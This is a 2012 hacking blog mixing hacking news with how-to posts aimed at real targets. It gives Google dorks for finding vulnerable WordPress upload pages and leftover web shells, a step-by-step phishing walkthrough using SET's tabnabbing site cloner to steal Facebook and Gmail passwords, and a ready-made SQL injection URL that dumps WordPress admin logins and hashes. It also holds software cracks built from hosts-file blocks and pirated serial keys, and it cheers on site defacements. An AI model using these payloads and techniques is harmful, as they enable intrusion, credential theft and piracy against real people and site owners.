Rabu, 21 Maret 2012

WordPress Remote File Upload Vulnerability with Asset Manager Hack Web sites

In WordPress we can upload our deface page using Remote File Upload Vulnerability with Asset Manager. Asset Manager is a plugin that allows you to upload your files Just simply follow the simple steps to hack the wordpress website.
1. Open google and search inurl:Editor/assetmanager/assetmanager.asp
2. Now open any result you will found look like bellow snapshot.
3. Just click on browse and upload your deface page.

wordpress hacking

Demo: Asset Manager Deface page

Minggu, 18 Maret 2012

Hacking GSM Mobile Network in India








A GSM mobile phone user in India is not very safe from hacking attacks, a security company has demonstrated.

Four founding members of a company called Matrix Shell say they have worked out a way to hack into India GSM phone numbers and make calls from them. They were able to use the unique SIM card number called International Mobile Subscriber Identity (IMSI) of their target victims.

Hack facebook account and Gmail account using Backtrack 5

In my previous tutorial I have explained “ How to hack facebook account using phishing ” , Now in this tutorial I am going to show you how to hack facebook account using backtrack 5. So just follow the simple steps.
Open your backtrack 5’s terminal and type cd /pentest/exploits/set
Backtrack5 1

Now Open social Engineering Tool kit (SET) ./set
backtrack5 2

Just hit ENTER and SET will Open , Now just select 1st option (1 Social-Engineering Attacks) and hit enter after that 2nd number (just type 2 as shown in snapshot)
backtrack5 3

Now Just select 4th Option “Tabnabbing Attack Method” and Hit ENTER
backtrack5 4

Then select 2nd option “Site Cloner” and Hit ENTER
backtrack5 5

Now here you need to add the URL of Facebook (if you want to hack gmail then just add the gmail’s URL)
backtrtack5 6

Now just hit the enter.
backtrack5 6

Open new terminal and just type ifconfig and hit ENTER
backtrack5 9

Now just copy this IP address and open it in Browser.
backtrack5 7

Now here I am just typing test email and password to see whether it works or not.
backtrack5 8

Now just hit enter and switch back to our terminal and we found the Email and password !
backtrack5 10

This tutorial is just educational purpose only.

Sabtu, 17 Maret 2012

5 Simple Hacks to Prank your friends


1. Crash a Computer System With Nothing But a URL!I stumbled across this URL while surfing the internet. This is a javascript "exploit" (that still works, by the way) and will hang/crash your system. It basically floods you with an infinite loop of mailto:xxx windows. To cancel this (and you have to move fast) kill the process of your email client before you run out of RAM.WARNING: CLICKING ON

Jumat, 16 Maret 2012

How to hack cell phones/ mobiles ?


# 1 -- Physical Access to the Phone -- Obviously, if a person can get physical access to a cell phone, even for a few seconds, it's game over. The person can clone it, place a remote spying tool on the phone or download the pictures and information directly to their own account.

#2 -- Hacking Email, Twitter and Apps -- Most celebrities are hacked through email, Twitter and other accounts that

Kamis, 15 Maret 2012

BBC hack attack linked to the Iranians






The BBC’s director general stops short of accusing Tehran, but speaks of strong links between the denial of service attack and the country.






The BBC has fallen victim to another cyber attack, with all eyes looking to Iran as the possible perpetrator.

The global media company believes adistributed denial of service (DDoS) attack was the reason for its outlets across Persia falling down

Rabu, 14 Maret 2012

Electronic voting system hacked









(AFP Photo / Joe Raedle)



When Washington, DC decided to try out an Internet voting system to make casting absentee ballots as easy as clicking a mouse, they dared hackers to compromise the contest. It was a feat accomplished in less than two days.The District of Columbia hosted a public trial before going live with an e-voting program to see if their presumably impenetrable online

Chinese Hack BAE to learn about F-35



This plane will have taken more than $385 billion to develop and will take $1 trillion to sustain. It is the most expensive weapons system in history. And yet for 18 months, the Chinese were just living on (at least) BAE’s networks taking what they wanted. How much of the considerable cost and rework on this program comes from the data on it China has stolen along the way? 
More Info on:
http:/

Maxsqli syntax maker tool

maxsqli syntax builder

This tool helps hackers/pentesters to create sql syntax. Its also help in waf bypass sql injection method. you can see the tool in the above snapshot.
Download it from here

Selasa, 13 Maret 2012

Control an Arduino from your Android device using a cheap bluetooth module


Check out this new instructable which shows you how to read sensor values from an Arduino with your Android device using a cheap bluetooth serial device you can order for under $10 on dealextreme or ebay.



This example uses Python as the scripting language for the Android scripting layer (SL4A) but you can choose from other languages like Perl, Lua, JavaScript etc. see: http://code.google.com/

Find Shells Using "Index of /sh3llZ" Google Dork

shells

After getting the admin access hackers are Uploading their control penal (that’s call shell). Shell allows hackers to hack/deface the website and using the shell hacker can get root access. Sometime hackers left the shell in vulnerable sits. And here is some Google dorks which helps you to find the shells.

intitle:index of/sh3llZ

"Index of /sh3llZ"

"/sh3llZ/uploadshell/uploadshell.php

You can see in the above figure there are some shells like c99.php , c100.php etc. using that shell u can upload your shell and you can also deface that site.

Credits:
Devils cafe

Senin, 12 Maret 2012

Daily Attack Round Up Annoymous hacks Vatican and 'The Consortium' Attacks Porn Site



The following two hacking attacks are been reported in the news today.



- Anonymous has hacked the Vatican for a second time. The website for the Catholic Church,vatican.va, is currently down. Unlike the first hack, which appeared to be a typical Distributed Denial of Service (DDoS) attack, this one is more than just taking down the website. The main target of the new strike is Vatican Radio,

Minggu, 11 Maret 2012

Crack Adobe Photoshop CS5 Extended Manually

PS_CS5_Extended_3in_boxshot

Adobe Photoshop CS5 Extended is the professional software for graphics designers and its very helpful in image editing. But the thing is that Adobe Photoshop CS5 Extended is not freeware it means they are just providing the trial version for 30 days after that it will ask you for serial key. If you have used Adobe Photoshop CS5 Extended then you may know that its not allowing fake serial key so we need to crack Adobe Photoshop CS5 Extended. For that just follow the simple steps.

1. go to C:\Windows\System32\drivers\etc
2.now double click on HOSTS file and paste the following code in to that file.

127.0.0.1 hl2rcv.adobe.com
127.0.0.1 adobeereg.com
127.0.0.1 activate.adobe.com
127.0.0.1 practivate.adobe.com
127.0.0.1 ereg.adobe.com
127.0.0.1 activate.wip3.adobe.com
127.0.0.1 ereg.wip3.adobe.com
127.0.0.1 wip3.adobe.com
127.0.0.1 activate-sea.adobe.com
127.0.0.1 wwis-dubc1-vip60.adobe.com
127.0.0.1 activate-sjc0.adobe.com
127.0.0.1 3dns.adobe.com
127.0.0.1 3dns-1.adobe.com
127.0.0.1 3dns-2.adobe.com
127.0.0.1 3dns-3.adobe.com
127.0.0.1 3dns-4.adobe.com
127.0.0.1 adobe-dns.adobe.com
127.0.0.1 adobe-dns-1.adobe.com
127.0.0.1 adobe-dns-2.adobe.com
127.0.0.1 adobe-dns-3.adobe.com
127.0.0.1 adobe-dns-4.adobe.com
127.0.0.1 adobe-dns-5.adobe.com
127.0.0.1 hh-software.com
127.0.0.1 www.hh-software.com
127.0.0.1 activate.adobe.de
127.0.0.1 practivate.adobe.de
127.0.0.1 ereg.adobe.de
127.0.0.1 activate.wip3.adobe.de
127.0.0.1 wip3.adobe.de
127.0.0.1 3dns-3.adobe.de
127.0.0.1 3dns-2.adobe.de
127.0.0.1 adobe-dns.adobe.de
127.0.0.1 adobe-dns-2.adobe.de
127.0.0.1 adobe-dns-3.adobe.de
127.0.0.1 ereg.wip3.adobe.de
127.0.0.1 activate-sea.adobe.de
127.0.0.1 wwis-dubc1-vip60.adobe.de
127.0.0.1 activate-sjc0.adobe.de
127.0.0.1 wwis-dubc1-vip60.adobe.de
127.0.0.1 hl2rcv.adobe.de
127.0.0.1 nero.com
127.0.0.1 www.nero.com
127.0.0.1 activate.nerao.com
127.0.0.1 www.activate.nero.com
127.0.0.1 nero.de
127.0.0.1 www.nero.de
127.0.0.1 activate.nero.de
127.0.0.1 www.activate.nero.de
127.0.0.1 validation.sls.microsoft.com


3. After that save that file. If its not allowing you to save that file then read our previous tutorial in that I have explained how to give write permission to hosts file.

4.Now open Adobe Photoshop CS5 Extended and just enter this serial key

1330-1245-8292-4567-6480-4584

And press Ok after that it will not ask you for serial key.


A team from a French security firm hacked Microsoft's Internet Explorer 9 (IE9) yesterday at 'Pwn2Own', making it two browsers busted in two days at the annual contest.Also on Thursday, Google patched Chrome to fix two vulnerabilities that a long-time contributor to its bug bounty program used the day before to win $60,000 at 'Pwnium', Google's first-ever hacking event.


http://pcworld.co.nz/

Sabtu, 10 Maret 2012

Pakistan defence got hacked and defaced by ro0t_d3vil

hacked by root devil

Once again Pakistan cyber space hit by Indian hacker , this time ro0t_d3vil from team INDISHELL have hacked and defaced Pakistan deface department's official site ! And the interesting thing is this site have 13,042 global rank and 331 in Pakistan.

And he have written awesome sentence in the deface page “This thing happens when you hire professionals with good marks nd not with good brains :) - ro0t_d3vil

Here is the hacked website and its mirror

http://www.defence.pk/ica.html

http://www.arab-zone.net/mirror/117127/defence.pk/ica.html

17 Countries Defense Ministries Hacked and defaced by ro0t_d3vil

hacked by root devil

Once again cyber space hit by Indian Hacker , this time ro0t_d3vil from team INDISHELL have hacked and defaced 17 Countries Defense Ministries !! so we can say that no once is secure !!

you can see the list of hacked website here

Jumat, 09 Maret 2012

Indian Server Rooted 350+ Indian Sites Got Hacked

indian sites got hacked

Pakistani hacking group named Pakistan Cyber Pyrates have gained the root access on the server and they have hacked and defaced more then 350 Indian sites. According to their deface page they want freedom of Kashmir and palestine.

You can see the list of hacked websites here.

Crack Any Latest Version Of Internet Download Manager IDM

internet download manager idm crack

Internet Download Manager ( IDM ) is the best download manager all we know but its not freeware means they are just providing the trial version for 1 month and after that IDM will ask for the serial key. without Original serial key IDM will not work. Because whenever you enter the serial key it will verify with its database and after that it will accept the serial key. so we need to crack it manually so just follow the simple steps.

1. Go to C:\Windows\System32\drivers\etc now you can see some files are there and double click on hosts file and open it with notepad.

idm 2

2. You can see how its look like.

idm 9

Now just paste this code after localhost

127.0.0.1 tonec.com
127.0.0.1 www.tonec.com
127.0.0.1 registeridm.com
127.0.0.1 www.registeridm.com
127.0.0.1 secure.registeridm.com
127.0.0.1 internetdownloadmanager.com
127.0.0.1 www.internetdownloadmanager.com
127.0.0.1 secure.internetdownloadmanager.com
127.0.0.1 mirror.internetdownloadmanager.com
127.0.0.1 mirror2.internetdownloadmanager.com


And save it . But if you are windows7 user then it will not allow you to make a change in that file , and I have also solution for that .

3. Right click on hosts file and select security tab (I have hide my user name)

idm 3

4. Now select USERS after that click on EDIT

idm 4
5. You can see one dialog box will open and in that select users

idm 5
6. Now you can see we don’t have write permission now just select full control.

idm 6
7.After that just simply click OK

idm 7
8.And one dialog box will open in that just press yes.

idm 8
Now you can save hosts file in windows 7. and after that add this serial key.

HUDWE-UO689-6D27B-YM28M

and click ok and you have done !

you can see my full version of IDM.

idm crack

Kamis, 08 Maret 2012

Hack WordPress Blog in easy way

In this tutorial I am going to show you how to hack wordpress blog in easy was so just follow the simple steps.

1. Open google and search inurl:"fbconnect_action=myhome"

2. Now open any link from the search result .

3. After opening the link just change this part of the URL ?fbconnect_action=myhome&userid= with this

?fbconnect_action=myhome&fbuserid=1+and+1=2+union+ select+1,2,3,4,5,concat(user_login,0x3a,user_pass) z​0mbyak,7,8,9,10,11,12+from+wp_users--

after that just hit enter you will see the admin id and hash (see the bellow snapshot ) now just decrypt the hash with md5 cracker and you have done !

wordpress blog 2

Rabu, 07 Maret 2012

How to Enable Telnet in Windows 7

telnet windows 7

In this tutorial I am going to show you how to enable telnet in windows 7 OS and there are also some hidden applications in the windows 7 professional like games , telnet etc. if you have used windows 7 professional then you may found that there is no game option. because by default its disabled by windows 7 so you need to enable the telnet manually. (if you want to enable the games in windows 7 professional then there is also options for game just follow the simple steps )

1.Open control pen
2.Click on programs and features.
3.Now at the left side you can see the “ turn windows features on or off ” option. (see the bellow snapshot.)

telnet windows 7 1

4.Now just select telnet client and telnet server and hit ok and you have done !

telnet windows 7 2

If you want to enable the games then there is a first option of games just mark it and hit ok and you have Done !

Selasa, 06 Maret 2012

Sql Poizon ~ Sqli Exploit Scanner Tool

Sql Poizon ~ Sqli Exploit Scanner Tool

Sql Poizon tool includes php , asp , rfi , lfi dorks and using this tools you can find vulnerable sites like sql vulnerable sites and you can also find vulnerable sites by country and you can hack sql vulnerable sites using Sql Poizon tool and you can also browse the sites using this tool.

sql tool

You can see above snapshot how it will find the sql vulnerable sites.
You can download Sql Poizon here

Sabtu, 03 Maret 2012

Download Windows 8 Consumer Preview ISO [32 & 64 Bit]

Windows 8 Consumer Preview is finally available for download . Earlier Microsoft released the developer preview which was available to download publicly. Now this time they have fixed thousands of issues and released the new edition which surely has a lot less bugs.

Before downloading the new release keep in mind that this is a Beta version that might have some bugs or issues your system will work fine but some application might not support.

There are many more features in the windows 8 !

Capture

The download links are as follow.

Download Windows 8 Consumer Preview (32-bit) [filesize: 2.5 GB ]
Download Windows 8 Consumer Preview (64-bit) [filesize: 3.3 GB]